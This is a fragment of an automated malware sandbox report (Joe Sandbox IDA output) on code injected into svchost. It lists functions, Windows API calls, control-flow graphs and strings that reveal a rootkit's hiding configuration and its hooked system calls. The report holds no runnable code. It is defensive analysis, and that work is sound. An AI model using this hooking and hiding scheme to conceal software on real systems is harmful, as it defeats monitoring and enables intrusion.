                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                      • String ID:
                                                                      • API String ID: 1683269324-0
                                                                      • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction ID: 0989cddc6aaa1a1faba2074b06e92315ed3e7b45a9aad1d7a4383a5ef0838ee0
                                                                      • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction Fuzzy Hash: 71115A366DC700A6F76097E0AAC7FF92296A748B1FF404128990FC1592FF7BC044C280
                                                                      Function 000001CBD8BD1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 000001CBD8BD1628: GetProcessHeap.KERNEL32 ref: 000001CBD8BD1633
                                                                        • Part of subcall function 000001CBD8BD1628: HeapAlloc.KERNEL32 ref: 000001CBD8BD1642
                                                                        • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD16B2
                                                                        • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD16DF
                                                                        • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD16F9
                                                                        • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD1719
                                                                        • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD1734
                                                                        • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD1754
                                                                        • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD176F
                                                                        • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD178F
                                                                        • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD17AA
                                                                        • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD17CA
                                                                      • Sleep.KERNEL32 ref: 000001CBD8BD1AD7
                                                                      • SleepEx.KERNELBASE ref: 000001CBD8BD1ADD
                                                                        • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD17E5
                                                                        • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD1805
                                                                        • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD1820
                                                                        • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD1840
                                                                        • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD185B
                                                                        • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD187B
                                                                        • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD1896
                                                                        • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD18A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1534210851-0
                                                                      • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction ID: b0c894f7784fe93fd5e4d912c2eb019049ba366880ae2a28af5649d789d49e3d
                                                                      • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction Fuzzy Hash: 94312571389B0161FB509BE2D6D37F9939AA744BCAF0464218E0FC7296FF17C451C290
                                                                      Function 000001CBD8BD3844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 58 1cbd8bd3844-1cbd8bd384f 59 1cbd8bd3869-1cbd8bd3870 58->59 60 1cbd8bd3851-1cbd8bd3864 StrCmpNIW 58->60 60->59 61 1cbd8bd3866 60->61 61->59
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: dialer
                                                                      • API String ID: 0-3528709123
                                                                      • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                      • Instruction ID: 6c3c39336d40b37e6c8cf9515fa28cbcf7c24992cf0487896dc8f09ec8df4234
                                                                      • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                      • Instruction Fuzzy Hash: 7CD05E703953059AFB159FEA88C6EF02351AB08B9AF888024890A81251EB5BC99DD750
                                                                      Function 000001CBD8BA273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction ID: 18b38bb5507917fa2352624df611951c3bb57cdfa5d1b2d23385e643455212a1
                                                                      • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction Fuzzy Hash: E4614732B8539087EB14CF948081BBD739AFB54B99F548131DE0E53785DB7AD852C784

                                                                      Non-executed Functions

                                                                      Function 000001CBD8BD2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 356 1cbd8bd2b2c-1cbd8bd2ba5 call 1cbd8bf2ce0 359 1cbd8bd2ee0-1cbd8bd2f03 356->359 360 1cbd8bd2bab-1cbd8bd2bb1 356->360 360->359 361 1cbd8bd2bb7-1cbd8bd2bba 360->361 361->359 362 1cbd8bd2bc0-1cbd8bd2bc3 361->362 362->359 363 1cbd8bd2bc9-1cbd8bd2bd9 GetModuleHandleA 362->363 364 1cbd8bd2bdb-1cbd8bd2beb GetProcAddress 363->364 365 1cbd8bd2bed 363->365 366 1cbd8bd2bf0-1cbd8bd2c0e 364->366 365->366 366->359 368 1cbd8bd2c14-1cbd8bd2c33 StrCmpNIW 366->368 368->359 369 1cbd8bd2c39-1cbd8bd2c3d 368->369 369->359 370 1cbd8bd2c43-1cbd8bd2c4d 369->370 370->359 371 1cbd8bd2c53-1cbd8bd2c5a 370->371 371->359 372 1cbd8bd2c60-1cbd8bd2c73 371->372 373 1cbd8bd2c83 372->373 374 1cbd8bd2c75-1cbd8bd2c81 372->374 375 1cbd8bd2c86-1cbd8bd2c8a 373->375 374->375 376 1cbd8bd2c9a 375->376 377 1cbd8bd2c8c-1cbd8bd2c98 375->377 378 1cbd8bd2c9d-1cbd8bd2ca7 376->378 377->378 379 1cbd8bd2d9d-1cbd8bd2da1 378->379 380 1cbd8bd2cad-1cbd8bd2cb0 378->380 381 1cbd8bd2da7-1cbd8bd2daa 379->381 382 1cbd8bd2ed2-1cbd8bd2eda 379->382 383 1cbd8bd2cc2-1cbd8bd2ccc 380->383 384 1cbd8bd2cb2-1cbd8bd2cbf call 1cbd8bd199c 380->384 385 1cbd8bd2dac-1cbd8bd2db8 call 1cbd8bd199c 381->385 386 1cbd8bd2dbb-1cbd8bd2dc5 381->386 382->359 382->372 388 1cbd8bd2d00-1cbd8bd2d0a 383->388 389 1cbd8bd2cce-1cbd8bd2cdb 383->389 384->383 385->386 393 1cbd8bd2dc7-1cbd8bd2dd4 386->393 394 1cbd8bd2df5-1cbd8bd2df8 386->394 390 1cbd8bd2d3a-1cbd8bd2d3d 388->390 391 1cbd8bd2d0c-1cbd8bd2d19 388->391 389->388 396 1cbd8bd2cdd-1cbd8bd2cea 389->396 398 1cbd8bd2d3f-1cbd8bd2d49 call 1cbd8bd1bbc 390->398 399 1cbd8bd2d4b-1cbd8bd2d58 lstrlenW 390->399 391->390 397 1cbd8bd2d1b-1cbd8bd2d28 391->397 393->394 401 1cbd8bd2dd6-1cbd8bd2de3 393->401 402 1cbd8bd2dfa-1cbd8bd2e03 call 1cbd8bd1bbc 394->402 403 1cbd8bd2e05-1cbd8bd2e12 lstrlenW 394->403 404 1cbd8bd2ced-1cbd8bd2cf3 396->404 407 1cbd8bd2d2b-1cbd8bd2d31 397->407 398->399 414 1cbd8bd2d93-1cbd8bd2d98 398->414 409 1cbd8bd2d5a-1cbd8bd2d64 399->409 410 1cbd8bd2d7b-1cbd8bd2d8d call 1cbd8bd3844 399->410 411 1cbd8bd2de6-1cbd8bd2dec 401->411 402->403 421 1cbd8bd2e4a-1cbd8bd2e55 402->421 405 1cbd8bd2e14-1cbd8bd2e1e 403->405 406 1cbd8bd2e35-1cbd8bd2e3f call 1cbd8bd3844 403->406 413 1cbd8bd2cf9-1cbd8bd2cfe 404->413 404->414 405->406 415 1cbd8bd2e20-1cbd8bd2e33 call 1cbd8bd152c 405->415 416 1cbd8bd2e42-1cbd8bd2e44 406->416 407->414 417 1cbd8bd2d33-1cbd8bd2d38 407->417 409->410 420 1cbd8bd2d66-1cbd8bd2d79 call 1cbd8bd152c 409->420 410->414 410->416 411->421 422 1cbd8bd2dee-1cbd8bd2df3 411->422 413->388 413->404 414->416 415->406 415->421 416->382 416->421 417->390 417->407 420->410 420->414 427 1cbd8bd2e57-1cbd8bd2e5b 421->427 428 1cbd8bd2ecc-1cbd8bd2ed0 421->428 422->394 422->411 432 1cbd8bd2e63-1cbd8bd2e7d call 1cbd8bd85c0 427->432 433 1cbd8bd2e5d-1cbd8bd2e61 427->433 428->382 435 1cbd8bd2e80-1cbd8bd2e83 432->435 433->432 433->435 438 1cbd8bd2ea6-1cbd8bd2ea9 435->438 439 1cbd8bd2e85-1cbd8bd2ea3 call 1cbd8bd85c0 435->439 438->428 441 1cbd8bd2eab-1cbd8bd2ec9 call 1cbd8bd85c0 438->441 439->438 441->428
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction ID: 79a09f8f3720bc5273b010d1f356e68a70ec6752ccfd98b3c301455b28cdac55
                                                                      • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction Fuzzy Hash: 4BB16B32258B9096FB698FE5D482BF963AAF744B8AF045016DE0F93794DB37D841C380
                                                                      Function 000001CBD8BD7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction ID: 03cf5bd3c19122581734986f2c10f6d311e666521bfd68b1f6af84beb660f4f4
                                                                      • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction Fuzzy Hash: F6319E72248B809AFB608FE0E881BED7365F785709F44402ADA4F87B94EF3AC549C740
                                                                      Function 000001CBD8BDD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction ID: a64a8fafea4748a103742ffd9067c0c0469601ae63dc2b93c66a8a842f97a94b
                                                                      • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction Fuzzy Hash: 67319332258F809AEB60CFA5E8817EE73A1F789759F540115EA9E83B54DF3AC145CB40
                                                                      Function 000001CBD8BD1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                      • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                      • API String ID: 106492572-2879589442
                                                                      • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction ID: 19dde69792006792dc4b80681f5feac67894e51617c30498e9630f35d049b7da
                                                                      • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction Fuzzy Hash: 7A713936758B1099FB119FE5E8D2AA96365F784B8EF006111DA4F87B29DF37C544C380
                                                                      Function 000001CBD8BD12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction ID: 4748ce0690830c0898785a435476f9b8f0d028ed3fb3b1bc3ab9656b80b8c298
                                                                      • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction Fuzzy Hash: 96516E32248B84CAF755CFE2E4857AAB7A1F789B9AF044124DA4E47719DF3EC045CB40
                                                                      Function 000001CBD8BD1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                      • API String ID: 4175298099-1975688563
                                                                      • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction ID: e634467b1f32646224c8287f2fc796e93386f02fba06a326c16b56ff7ceecbf6
                                                                      • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction Fuzzy Hash: A6318474589B8AA4FA05DBE9E8D3EF46326A70434EF845013941F86166AFBBC24DC3D0
                                                                      Function 000001CBD8BA6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 202 1cbd8ba6910-1cbd8ba6916 203 1cbd8ba6918-1cbd8ba691b 202->203 204 1cbd8ba6951-1cbd8ba695b 202->204 205 1cbd8ba6945-1cbd8ba6984 call 1cbd8ba6fc0 203->205 206 1cbd8ba691d-1cbd8ba6920 203->206 207 1cbd8ba6a78-1cbd8ba6a8d 204->207 225 1cbd8ba698a-1cbd8ba699f call 1cbd8ba6e54 205->225 226 1cbd8ba6a52 205->226 208 1cbd8ba6938 __scrt_dllmain_crt_thread_attach 206->208 209 1cbd8ba6922-1cbd8ba6925 206->209 210 1cbd8ba6a9c-1cbd8ba6ab6 call 1cbd8ba6e54 207->210 211 1cbd8ba6a8f 207->211 217 1cbd8ba693d-1cbd8ba6944 208->217 213 1cbd8ba6927-1cbd8ba6930 209->213 214 1cbd8ba6931-1cbd8ba6936 call 1cbd8ba6f04 209->214 223 1cbd8ba6ab8-1cbd8ba6aed call 1cbd8ba6f7c call 1cbd8ba6e1c call 1cbd8ba7318 call 1cbd8ba7130 call 1cbd8ba7154 call 1cbd8ba6fac 210->223 224 1cbd8ba6aef-1cbd8ba6b20 call 1cbd8ba7190 210->224 215 1cbd8ba6a91-1cbd8ba6a9b 211->215 214->217 223->215 236 1cbd8ba6b31-1cbd8ba6b37 224->236 237 1cbd8ba6b22-1cbd8ba6b28 224->237 234 1cbd8ba69a5-1cbd8ba69b6 call 1cbd8ba6ec4 225->234 235 1cbd8ba6a6a-1cbd8ba6a77 call 1cbd8ba7190 225->235 230 1cbd8ba6a54-1cbd8ba6a69 226->230 252 1cbd8ba6a07-1cbd8ba6a11 call 1cbd8ba7130 234->252 253 1cbd8ba69b8-1cbd8ba69dc call 1cbd8ba72dc call 1cbd8ba6e0c call 1cbd8ba6e38 call 1cbd8baac0c 234->253 235->207 242 1cbd8ba6b39-1cbd8ba6b43 236->242 243 1cbd8ba6b7e-1cbd8ba6b94 call 1cbd8ba268c 236->243 237->236 241 1cbd8ba6b2a-1cbd8ba6b2c 237->241 248 1cbd8ba6c1f-1cbd8ba6c2c 241->248 249 1cbd8ba6b45-1cbd8ba6b4d 242->249 250 1cbd8ba6b4f-1cbd8ba6b5d call 1cbd8bb5780 242->250 263 1cbd8ba6b96-1cbd8ba6b98 243->263 264 1cbd8ba6bcc-1cbd8ba6bce 243->264 255 1cbd8ba6b63-1cbd8ba6b78 call 1cbd8ba6910 249->255 250->255 267 1cbd8ba6c15-1cbd8ba6c1d 250->267 252->226 275 1cbd8ba6a13-1cbd8ba6a1f call 1cbd8ba7180 252->275 253->252 305 1cbd8ba69de-1cbd8ba69e5 __scrt_dllmain_after_initialize_c 253->305 255->243 255->267 263->264 272 1cbd8ba6b9a-1cbd8ba6bbc call 1cbd8ba268c call 1cbd8ba6a78 263->272 265 1cbd8ba6bd5-1cbd8ba6bea call 1cbd8ba6910 264->265 266 1cbd8ba6bd0-1cbd8ba6bd3 264->266 265->267 284 1cbd8ba6bec-1cbd8ba6bf6 265->284 266->265 266->267 267->248 272->264 299 1cbd8ba6bbe-1cbd8ba6bc6 call 1cbd8bb5780 272->299 292 1cbd8ba6a45-1cbd8ba6a50 275->292 293 1cbd8ba6a21-1cbd8ba6a2b call 1cbd8ba7098 275->293 289 1cbd8ba6bf8-1cbd8ba6bff 284->289 290 1cbd8ba6c01-1cbd8ba6c11 call 1cbd8bb5780 284->290 289->267 290->267 292->230 293->292 304 1cbd8ba6a2d-1cbd8ba6a3b 293->304 299->264 304->292 305->252 306 1cbd8ba69e7-1cbd8ba6a04 call 1cbd8baabc8 305->306 306->252
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                      • API String ID: 190073905-1786718095
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: 07fdd0c7d24b3d781066f053deca9409dd143e813ed5482003d316b44598c601
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: 7881D3B178C7018AFA909BE594C3BF92290EB5678EF4440159A4FC3796DBBBC845C788
                                                                      Function 000001CBD8BDCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 309 1cbd8bdce28-1cbd8bdce4a GetLastError 310 1cbd8bdce69-1cbd8bdce74 FlsSetValue 309->310 311 1cbd8bdce4c-1cbd8bdce57 FlsGetValue 309->311 314 1cbd8bdce76-1cbd8bdce79 310->314 315 1cbd8bdce7b-1cbd8bdce80 310->315 312 1cbd8bdce59-1cbd8bdce61 311->312 313 1cbd8bdce63 311->313 316 1cbd8bdced5-1cbd8bdcee0 SetLastError 312->316 313->310 314->316 317 1cbd8bdce85 call 1cbd8bdd6cc 315->317 318 1cbd8bdcef5-1cbd8bdcf0b call 1cbd8bdc748 316->318 319 1cbd8bdcee2-1cbd8bdcef4 316->319 320 1cbd8bdce8a-1cbd8bdce96 317->320 332 1cbd8bdcf28-1cbd8bdcf33 FlsSetValue 318->332 333 1cbd8bdcf0d-1cbd8bdcf18 FlsGetValue 318->333 322 1cbd8bdcea8-1cbd8bdceb2 FlsSetValue 320->322 323 1cbd8bdce98-1cbd8bdce9f FlsSetValue 320->323 324 1cbd8bdcec6-1cbd8bdced0 call 1cbd8bdcb94 call 1cbd8bdd744 322->324 325 1cbd8bdceb4-1cbd8bdcec4 FlsSetValue 322->325 327 1cbd8bdcea1-1cbd8bdcea6 call 1cbd8bdd744 323->327 324->316 325->327 327->314 335 1cbd8bdcf98-1cbd8bdcf9f call 1cbd8bdc748 332->335 336 1cbd8bdcf35-1cbd8bdcf3a 332->336 338 1cbd8bdcf1a-1cbd8bdcf1e 333->338 339 1cbd8bdcf22 333->339 340 1cbd8bdcf3f call 1cbd8bdd6cc 336->340 338->335 341 1cbd8bdcf20 338->341 339->332 344 1cbd8bdcf44-1cbd8bdcf50 340->344 345 1cbd8bdcf8f-1cbd8bdcf97 341->345 346 1cbd8bdcf62-1cbd8bdcf6c FlsSetValue 344->346 347 1cbd8bdcf52-1cbd8bdcf59 FlsSetValue 344->347 349 1cbd8bdcf80-1cbd8bdcf8a call 1cbd8bdcb94 call 1cbd8bdd744 346->349 350 1cbd8bdcf6e-1cbd8bdcf7e FlsSetValue 346->350 348 1cbd8bdcf5b-1cbd8bdcf60 call 1cbd8bdd744 347->348 348->335 349->345 350->348
                                                                      APIs
                                                                      • GetLastError.KERNEL32 ref: 000001CBD8BDCE37
                                                                      • FlsGetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCE4C
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCE6D
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCE9A
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCEAB
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCEBC
                                                                      • SetLastError.KERNEL32 ref: 000001CBD8BDCED7
                                                                      • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCF0D
                                                                      • FlsSetValue.KERNEL32(?,?,00000001,000001CBD8BDECCC,?,?,?,?,000001CBD8BDBF9F,?,?,?,?,?,000001CBD8BD7AB0), ref: 000001CBD8BDCF2C
                                                                        • Part of subcall function 000001CBD8BDD6CC: HeapAlloc.KERNEL32 ref: 000001CBD8BDD721
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCF54
                                                                        • Part of subcall function 000001CBD8BDD744: HeapFree.KERNEL32 ref: 000001CBD8BDD75A
                                                                        • Part of subcall function 000001CBD8BDD744: GetLastError.KERNEL32 ref: 000001CBD8BDD764
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCF65
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCF76
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast$Heap$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 570795689-0
                                                                      • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction ID: 380e374fd0efe43d558c039f956dcbd27f9d5249dad7ecb7c9ae31faf30a61ac
                                                                      • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction Fuzzy Hash: 06413C702CD34462F96967F595E3BF922539B447AEF141B24A83FC67E6EB2BD401C280
                                                                      Function 000001CBD8BD2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
